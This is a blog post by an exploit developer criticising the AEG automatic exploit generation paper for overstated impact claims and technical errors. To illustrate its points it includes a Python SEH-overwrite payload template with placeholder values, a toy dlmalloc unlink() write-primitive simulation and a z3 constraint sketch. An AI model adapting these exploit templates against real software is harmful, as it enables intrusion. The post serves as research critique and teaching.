Sometimes I read a research paper, usually in the area where computer science meets application, and it’s obvious that the authors are far overstating the practical impact of the work. This can be because the researchers simply have no exposure to the practical side of the field they are investigating, and thus accidentally (through ignorance) overstate their claims. Alternatively, it can be a deliberate attempt to mislead and posture in front of a readership that hopefully won’t know any better.
The first case is presumably simple ignorance but is still lamentable. The obvious solution here is to avoid making such claims at all. If the research cannot stand on its own then perhaps it is not worthwhile? Researchers (both academic and industrial) have a habit of jumping on problems they underestimate, throwing a variety of techniques at them in the hope that one sticks, and then declaring the problem solved. This typically occurs when they are not actually required to solve the problem correctly and robustly but merely to produce a ‘prototype’. They then get pilloried by anyone who actually has to solve the problem properly, and almost always because of the disparity between the claims made and the real impact, rather than because of issues with methodology, reporting or other technical aspects.
The second case is far more insidious and, unfortunately, I think not uncommon. In academic research it can be easy to impress by combining cutting-edge, but not necessarily original, research with a practical problem, sort-of solving parts of it and, as before, declaring it solved. This is often followed quickly by phrases involving ‘game changing’, ‘paradigm shifting’ and so forth. Personally, I think this is a serious problem in the research areas that are less theoretical and more practical. Often the investigators refuse to accept that they aren’t actually aware of the true nature of the problem they are dealing with, or of how it occurs in the real world. Egotistically this is difficult: they are lauded by their academic peers, so surely they must grasp the trivialities of the practical world, no? At this point a mixture of ego, the need to impress and a lack of ethics combine to give us papers that are at best deluded and at worst downright wrong.
Regardless of whether a paper ends up making such claims for the first reason or the second, the result is the same. It cheapens the actual value of the research, results in a general loss of respect for the capabilities of academia, deludes the researchers further and causes general confusion as to where research efforts should be focused. Worse still is when the overstated impact is believed by both the media and other researchers, resulting in a complete distortion between the actual practical and theoretical value of the research and its perceived impact.
Now, on to the paper that has reminded me of this most recently: the latest paper from David Brumley’s group at CMU, titled “AEG: Automatic Exploit Generation”. I was looking forward to reading this paper, as it is the area I worked on during my thesis, but quite honestly it is incredibly disappointing at best and has serious factual issues at worst. For now let’s focus on the topic at hand: ‘overstating the impact of academic research cheapens it and spreads misinformation’. With the original Patch-Based Exploit Generation paper we had all sorts of stories about how it would change the way in which patches had to be distributed, how attackers would be pushing buttons to generate their exploits in no time at all and, in general, how the world was about to end. Naturally none of this happened and people continued to use PatchDiff. Unfortunately this paper is more of the same.
Near the beginning of the most recent paper we have the following claim: “Our automatic exploit generation techniques have several immediate security implications. First, practical AEG fundamentally changes the perceived capabilities of attackers”. This statement is fundamentally flawed. It assumes that practical AEG is currently possible on bugs that people actually care about. This is patently false. I’ve written one of these systems. Did it generate exploits? Yes, it did. Is it going to pop any program running on a modern operating system with the kinds of vulnerabilities we typically see? Nope. That would require, at a minimum, another two years of development, and at that point I would expect a system that is usable by a skilled exploit writer as an augmentation of his skillset rather than a replacement. The few times I did use the tool I built for real exploits it was in this context rather than full-blown exploit generation. The system discussed in the paper has more bells and whistles in some areas and is more primitive in others, and it is still an unfathomable distance from having any impact on a realistic threat model.
Moving on: “For example, previously it has been believed that it is relatively difficult for untrained attackers to find novel vulnerabilities and create zero-day exploits. Our research shows this assumption is unfounded”. It’s at this point that the distance between the authors of this paper and the realities of industrial/government/military vulnerability detection and exploit development can be seen. Who are the people we are to believe hold this view? I would assume the authors themselves did, and then extrapolated to the general exploit-creating/consuming community. This is an egotistical flaw that has been on display in many forays by academia into the vulnerability detection/exploit generation world.
Let’s discuss this in two parts: firstly, in the context of the exploits discussed in this paper, and secondly, in the context of exploits seen in the real world.
In the case of the bug classes considered in the paper this view is entirely incorrect. Anyone who looks at Full Disclosure can regularly see low-hanging bugs being fuzzed and exploited in a cookie-cutter style. Fuzz the bug, overwrite the SEH chain, find your trampoline, jump to your shellcode, bla bla bla, rinse and repeat, start a leet h4x0r group and flood Exploit DB (the whole pattern is sketched below). All good fun, no useful research dollars wasted. The bugs found and exploited by the system described are of that quality: low-hanging, fuzzable fruit. The ‘training’ involved here is no more than would be required to set up, install and debug whatever issues come up in the course of running the AEG tool. In our most basic class at Immunity I’ve seen people who’ve never seen a debugger before writing exploits of this quality in a couple of days.
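To make the cookie-cutter point concrete, here is a minimal sketch of that payload layout in Python. Every concrete value in it (the padding length, the pop/pop/ret address, the shellcode) is a hypothetical placeholder rather than something from a real target; in practice they come from a few minutes in a debugger, which is exactly the point.

```python
import struct

# Hypothetical values for illustration only. In a real exploit these come
# from crashing the target under a debugger and searching its loaded
# modules for a suitable trampoline.
OFFSET_TO_SEH = 520           # bytes of padding before the SEH record (assumed)
POP_POP_RET   = 0x1001A3BC    # address of a pop/pop/ret gadget in a module
                              # compiled without SafeSEH (assumed)
SHELLCODE     = b"\xcc" * 32  # placeholder for real shellcode

# Classic SEH-overwrite layout:
#   [padding][nSEH: short jmp over the record][SEH: pop/pop/ret][shellcode]
payload  = b"A" * OFFSET_TO_SEH
payload += b"\xeb\x06\x90\x90"             # nSEH: jmp short +6, into the shellcode
payload += struct.pack("<I", POP_POP_RET)  # SEH: trampoline back into our buffer
payload += SHELLCODE

with open("crash_input.bin", "wb") as f:
    f.write(payload)
```

Filling in those three placeholders is the extent of the ‘training’ in question.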
For more complex vulnerabilities and exploits that require a skilled attacker, this AEG system doesn’t change the threat model. It simply doesn’t apply. A fully functional AEG tool that I can point at Firefox and press the ‘hack’ button would of course change the threat model (as would any tool that had some sort of impact on real threats; I’d be happy with exploit assistance rather than exploit generation, as long as it works), but we are a long, long way from that. This is not to say we won’t get there, or that this paper isn’t a step in the right direction, but making the claim now is simply laughable. To me it just reeks of a research group desperate to shout ‘FIRST!’ and ignoring the real issues.
A few more choice phrases for your viewing pleasure:
“Automated exploit generation can be fed into signature generation algorithms by defenders without requiring real-life attacks” – Fiction again. This would be possible *if* one had a usable AEG system. The word I presume they are looking for is *could*: “could be fed into”.
“In order to extend AEG to handle heap-based overflows we would need to also consider heap management structures, which is a straight-forward extension” – Again, this displays a fundamental ignorance of what has been required to write a heap exploit for the past six or so years. I presume they heard about the unlink() technique and investigated no further. Automatic generation of heap exploits requires one to be able to discover and trigger heap-manipulation primitives to put the heap into a predictable state, on top of whatever else must be done to build the corruption itself. This is a difficult problem to solve automatically and one that the paper completely ignores.
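For context, the unlink() technique they presumably have in mind abused the allocator’s own list surgery to get a write-what-where. Here is a toy simulation of that primitive, assuming the circa-2003 32-bit dlmalloc chunk layout; all addresses and offsets are invented for illustration.

```python
# Toy model of the classic dlmalloc unlink() write primitive. Memory is a
# dict from address to value. Unlinking a free chunk does:
#   FD->bk = BK; BK->fd = FD
# With attacker-controlled fd/bk this becomes a 4-byte write-what-where.

CHUNK_FD_OFF = 8   # offsetof(chunk, fd) in 32-bit dlmalloc (assumed layout)
CHUNK_BK_OFF = 12  # offsetof(chunk, bk)

memory = {}

def unlink(chunk):
    fd = memory[chunk + CHUNK_FD_OFF]
    bk = memory[chunk + CHUNK_BK_OFF]
    memory[fd + CHUNK_BK_OFF] = bk  # FD->bk = BK  <-- the attacker's write
    memory[bk + CHUNK_FD_OFF] = fd  # BK->fd = FD  (side effect: clobbers 4
                                    # bytes at bk+8, hence the old trick of a
                                    # short jmp at the start of the shellcode)

# The overflow sets fd = where - 12 and bk = what:
GOT_ENTRY = 0x08049774  # hypothetical 'where', e.g. a GOT entry
NEW_VALUE = 0x0804A040  # hypothetical 'what', e.g. a shellcode address

fake_chunk = 0x1000
memory[fake_chunk + CHUNK_FD_OFF] = GOT_ENTRY - CHUNK_BK_OFF
memory[fake_chunk + CHUNK_BK_OFF] = NEW_VALUE

unlink(fake_chunk)
assert memory[GOT_ENTRY] == NEW_VALUE  # arbitrary write achieved
```

Safe-unlinking checks killed this particular trick around 2004, and everything since then (heap grooming, application-specific primitives, function pointer overwrites) is precisely the part that is not a “straight-forward extension”.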
In reference to overflows that smash local variables and arguments that are dereferenced before the function returns, and which therefore must remain valid – “If there is not enough space to place the payload before the return address, AEG can still generate an exploit by applying stack restoration, where the local variables and function arguments are overwritten, but we impose constraints that their values should remain unchanged. To do so, AEG again relies on our dynamic analysis component to retrieve the runtime values of the local variables and arguments” – It’s at this point that I start to wonder if anyone even reviewed this thing. In any program with some amount of heap non-determinism, whether through normal behaviour or heap base randomisation, this statement makes no sense. Any pointers to heap-allocated data passed as arguments or stored as local variables will be entirely different from run to run. You may be lucky and end up with such a pointer landing in an allocated heap region, but the chances of it pointing to the same object are rather slim in general. Even in the context of local exploits, where you have much more information on heap bases and so on, this statement trivialises many problems that will be encountered.
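To spell out the objection: the constraint itself is trivial to state, which is presumably why it looks straightforward on paper. Here is a sketch of my reading of the technique, expressed with z3 from Python; the offsets and the observed pointer value are invented for illustration and this is not their implementation.

```python
from z3 import BitVec, Solver, sat

# Symbolic bytes of the overflowing payload.
PAYLOAD_LEN = 64
payload = [BitVec(f"b{i}", 8) for i in range(PAYLOAD_LEN)]

s = Solver()

# 'Stack restoration' as described: payload bytes overlapping a live local
# or argument are pinned to the concrete values seen in ONE dynamic run.
# Hypothetical example: a 4-byte heap pointer argument at offset 40 whose
# value in the recorded run was 0x092a5160 (little-endian below).
observed_heap_ptr = [0x60, 0x51, 0x2A, 0x09]
for i, v in enumerate(observed_heap_ptr):
    s.add(payload[40 + i] == v)

# The remaining bytes stay free for the usual payload constraints,
# e.g. no NUL bytes so a strcpy-style overflow copies the whole thing:
for i in range(PAYLOAD_LEN):
    if not (40 <= i < 44):
        s.add(payload[i] != 0)

assert s.check() == sat
# The solver happily 'restores' 0x092a5160. But on the next run, with a
# randomised or merely non-deterministic heap, the object lives somewhere
# else and the restored pointer dangles: the exploit dereferences garbage.
```

The constraint is satisfiable every time; it is the concrete value being pinned that is only valid for a single heap layout, which is the point the paper skips over.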
Conclusion
With the above paper I have two main issues. One is with the correctness of some of the technical statements made, and the other is with the distortion between reality and the stated impact and generality of the work. For the technical issues, I think the simple observation that they exist is enough to highlight the problem. The flawed statements on impact and generality are more problematic, as they display a fundamental corruption of what a scientific paper should be.
I have a deep respect for scientific research and the ideals that I believe it should embody. Much of this research is done by university research groups, and some of the papers produced in the last century are among humanity’s greatest intellectual achievements. Not all papers can be revolutionary of course, but even those that aren’t should aim to uphold a level of scientific decorum so that they may contribute to the sum of our knowledge. In my opinion this single idea should be at the heart of any university researcher being funded to perform scientific investigation. A researcher is neither a journalist nor a politician, and their papers should not be opinion pieces, nor designed to promote their authors at the expense of facts. There is nothing wrong with discussing the perceived impact of a paper within the paper itself, but such statements should be subjected to the same scientific rigour as the theoretical content of the paper. If one is unqualified to make such statements (as in the above paper) then those statements should be excluded. Facts are all that matter in a scientific paper; distorting them through ignorance is incompetence, distorting them on purpose is unethical and corrupt.